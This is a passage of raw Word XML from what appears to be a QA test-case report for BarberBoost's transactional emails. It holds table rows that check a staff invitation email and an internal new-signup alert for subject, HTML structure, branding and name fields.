            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="2BAAECA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5745C39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A5DE571" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6E0CCC2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STF-14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7C01606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5BDCB7C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includes “View </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>BarberBoost</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>” CTA button</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3D82E4B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618E479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1261023" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="6F37FB9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STF-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="51BC8E8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49B4987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Plain text has shop name in UPPERCASE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="3049519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07CBD13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ECB7813" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1C45CA6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STF-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3C73D53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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="42C8B252" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ownerName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: null</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> — HTML contains no literal “null”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="286DC4D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Confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="16261A4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0BB487A" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="6ECA600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STF-17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="64D287F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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="7BB6FB2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delivered via Resend API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="35CDDAA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Resend ID: </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>e185ba44</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="3549868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bl>
    <w:p w14:paraId="0BD86330"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lastRenderedPageBreak/>
        <w:t>Subject line format:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You've been added to Crown Cuts Barbershop on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>BarberBoost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0761ED60" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="271E213D">
          <v:rect id="_x0000_i1037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DC338C" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6" w:rsidP="00020772">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="40"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="tc-nsa-new-signup-alert-internal"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TC-NSA — New Signup Alert (Internal)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B25A1F"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Triggered alongside the welcome email in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>GET /auth/callback</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and independently via </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>POST /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/signup-notify</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Sent to the internal </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NOTIFY_EMAIL</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> address.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7"/>
        <w:gridCol w:w="1857"/>
        <w:gridCol w:w="1858"/>
        <w:gridCol w:w="1858"/>
        <w:gridCol w:w="1858"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="09511360"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single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="2938566B"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TC-ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="715803B6"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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="589349D6"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Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="2584862A"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Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="681BB08E"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5CA2CFE8" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="066110E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NSA-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="54D2759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28F6E001"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subject</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> field is a non-empty string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="21FC434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65ADEE7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2836143" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6D0ECE5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NSA-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6C0F08B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17CE5356"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html</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> field is &gt; 100 chars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="615FD1A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2869 chars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="33FAAB1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41F6B92" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="7537062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NSA-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="5AF3021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37A33D8A"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text</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> fallback field present</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="0C7C982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211 chars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="22E69CF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B3C0A04" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="446E855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NSA-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5EFE81D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64C8257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&lt;!DOCTYPE html&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6D532D6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B02F34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9A8CAF6" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="395914C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NSA-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="297E90D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7786BE8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contains </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>BARBERBOOST</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> branding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="07480CA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7219FA6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5C18782" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0B7F356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NSA-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2A2FA74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0131FF6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uses </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>brand</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> gold </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>colour</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="761EEDD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1B9888B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5FCDE3F" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="2C78547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NSA-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="1F4CB1E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shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="5C516A2B"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&lt;div&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> tags balanced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="3A62D48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1 pair</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="7C7F2D6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458996D" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="40E6E20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NSA-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="747A7A9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structural</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="19BDCE58"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&lt;td&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> tags balanced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="21A1D79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12 pairs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="58D7A81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1BE4FB8" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="3602DC5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NSA-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="26CBC51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2556BE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includes owner name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="521A827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5E0C1CE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F3C086A" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4D05125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NSA-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="569DA54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78D9FFB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includes shop name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5E34CDE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2ACCD60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649C44E6" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="0D1B88A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NSA-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="74552BD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0280403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detail row shows owner name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="0D2C0E6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6E30E3B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38F81D2" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5A0C186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NSA-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
